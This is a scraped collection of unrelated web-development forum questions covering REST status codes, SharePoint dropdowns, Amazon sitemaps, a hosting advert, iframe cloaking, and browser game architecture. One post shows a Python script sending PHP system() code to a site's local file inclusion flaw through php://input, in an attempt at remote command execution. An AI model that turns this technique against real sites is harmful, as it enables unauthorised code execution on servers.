web development – Accessing Animal not belonging to User: 400, 401, 403, 404, other?

Consider animals being some REST resources. User has animals assigned to him.

The endpoint /api/animals/{animalId}/feed is used to feed a given animal by the authenticated user.

User should not be able to feed animals he does not own. What HTTP status code should be emitted in such a scenario?

400, 401, 403, 404, something else?


Also, should the situation where passing animalId that does not exist, e.g. 123456789 be distinguished from the situation where animalId does not belong to the logged in user?

I personally feel like I should return 404 in all cases.


This seems like a typical REST design situation, so I am wondering how experienced devs would solve it.

Cascading dropdown list in SPFx web part

You can do this using SPServices

$().SPServices.SPCascadeDropdowns({
relationshipList: "States",
relationshipListParentColumn: "Country",
relationshipListChildColumn: "Title",
parentColumn: "Country",
childColumn: "State",
debug: true
});

You can check the example in the below link

https://social.technet.microsoft.com/wiki/contents/articles/37676.sharepoint-2013-cascade-dropdown-list-using-spservices-spservices-spcascadedropdowns.aspx

The below image is very helpful to avoid confusion with using it

enter image description here

web crawlers – What are some URLs to get to amazon sitemap? I have some…need more

I have some below. If you have any please include them in answer or if you find any logic to get more sitemap URL’s by utilizing following links then I will greatly appreciated.

Got these URL’s here

Sitemap: http://www.amazon.com/sitemaps.f3053414d236e84.SitemapIndex_0.xml.gz
Sitemap: http://www.amazon.com/sitemaps.1946f6b8171de60.SitemapIndex_0.xml.gz
Sitemap: http://www.amazon.com/sitemaps.bbb7d657c7e29fa.SitemapIndex_0.xml.gz
Sitemap: http://www.amazon.com/sitemaps.11aafed315ee654.SitemapIndex_0.xml.gz
Sitemap: http://www.amazon.com/sitemaps.c21f969b5f03d33.SitemapIndex_0.xml.gz

web application – LFI php://input returning initial argument?

TLDR: Trying to execute commands on site thats got a LFI vuln.

So I am making my post request to my vulnerable site and

import requests
header = {
            'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language':'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection':'close'
}

command = "<? system("echo does this work");?>"
requests.post("https://www.vulnsite.com/pog=php://input", headers=header, data=command)

then if i look at the actual response it returns:
<? system("echo does this work");?>

why isn’t it returning “does this work”? how can I get it to execute actual commands? what am I doing wrong?

SeedVPS – SSD Web Hosting in Europe, Netherlands | cPanel | CloudLinux | LiteSpeed | From €5 | NewProxyLists

__

Plans starting from €5 EUR

Check out our web hosting plans here:

=====> https://www.seedvps.com/web-hosting <====

__

Our servers

  • HP Generation 9 Servers
  • Dual 2x Intel E5 CPUs
  • Pure SSD Storage
  • DDR4 ECC RAM
  • Enterprise HDDs / Datacenter SSDs
  • Hardware RAID10 Storage
  • 10 Gbps NICs

__

Features

  • CloudLinux OS
  • Latest cPanel
  • LiteSpeed Web Server
  • MariaDB
  • PHP Version Selector
  • Python and Ruby Selector
  • Let’s Encrypt SSL
  • Free Migration
  • DDoS Protection
  • Softaculous One-Click Software install (300+ Scripts)
  • Jetbackup – Free Daily Backup
  • Imunify360 Virus & Malware protection
  • Instant Setup
  • 7 Days Money Back Guarantee
  • 10Gbps Port
  • 99.9% Uptime Guaranteed

__

50+ INTERNATIONAL Payment methods: PayPal, Skrill, Credit/Debit Cards, iDEAL, Sofort Banking, Bank Transfer, Bitcoin and more.

Looking Glass: lg.nl.seedvps.com

Status Page: status.seedvps.com

SeedVPS is an established company operating since 2013

Visit our website https://www.seedvps.com

Contact us sales@seedvps.com​

web hosting – Problem with iframe cloaking, How can I add all my website files into a domain name itself?

I have come to the point where a “simple” way of building websites is just not able to facilitate larger projects. I have been using repl.it to simply host and read files I have coded in HTML, CSS, JS and other environments. I simply just cloak over a domain (which uses an iframe) that is a very cheap solution for a low quality performance website. The code itself is fine, I am currently on a chat website application and the iframe simply doesn’t handle to the simple features that other devices may have. For example, the iframe looks fine on a computer or larger screen device, but once I use a phone to test the site, the iframe tries to cloak over it as it’s a desktop screen. From the repl.it itself, it is a responsive design, the website fits all screen resolution borders and looks good on every device, this only works from the repl.it hosting domain which is just too long and ugly and that is the only reason why I am using a cloak to hide the name, but with that comes other problems.

Is there a way I can directly put my files over a domain name itself, or host? The website uses socket.io as the server and it all works out, it’s just when cloaked, the screen borders are zoomed right out so it can try and fit a computer screen.

The zoomed out one is when it is cloaked, and the perfect one is how I would like it to look as it is directly hosted off replit

enter image description here

enter image description here

Render LaTeX Facebook – Web Applications Stack Exchange

How do I render LaTeX in Facebook? The Chrome “Tex all the things” extension does not work.
It does not render, it does not render, it does not render, it does not render. It does not render, it does not render, it does not render, it does not render.

Buscar una palabra en una web

Hola ¿hay alguna funcion o ejemplo por aqui en javascript que permita buscar una palabra concreta en una url?

web development – Search engine URL Submission automation

So i built a search engine to accompany my companies social network. The search engine is called www.mymegalo.com now i have a manual url entry option and i need a way to automate URL entry at link https://www.mymegalo.com/index.php?a=addurl

Now i need a way to crawl other search engines and enter the websites crawled to the search engine i built. This search engine has 40.000 search results currently and I need 1 million before it goes public with the web browser im building. Anyone have a solution. How does mojeek and duck duck go get results. Thanks.

architecture – Best way to approach drop-in out Online Web Game

I’m attempting to conceptualize a browser-based “office” style game where users will connect, do their actions, then disconnect. As the main concept of the game can last from a day to a week.

With the above general concept I want to establish a front-end and back-end. Where in the front-end it would use REST requests to the back-end server which will then based on that information draw the game world and it’s components accordingly. For reference, I’m considering using phaser.js for my front end game engine, with the rest of the site running on some front-end framework. As for my back-end my thought was to store the game data in a SQL database then serve it up via some web framework (eg. Flask).

My question being would this be a valid approach to creating a game like this, where a game world is persisted in a SQL environment. I’ve read that generally this is not the case due to long I/O times. However the game instead will operate on ticks (anywhere from 5-30 minutes), so I/O time is not really an issue.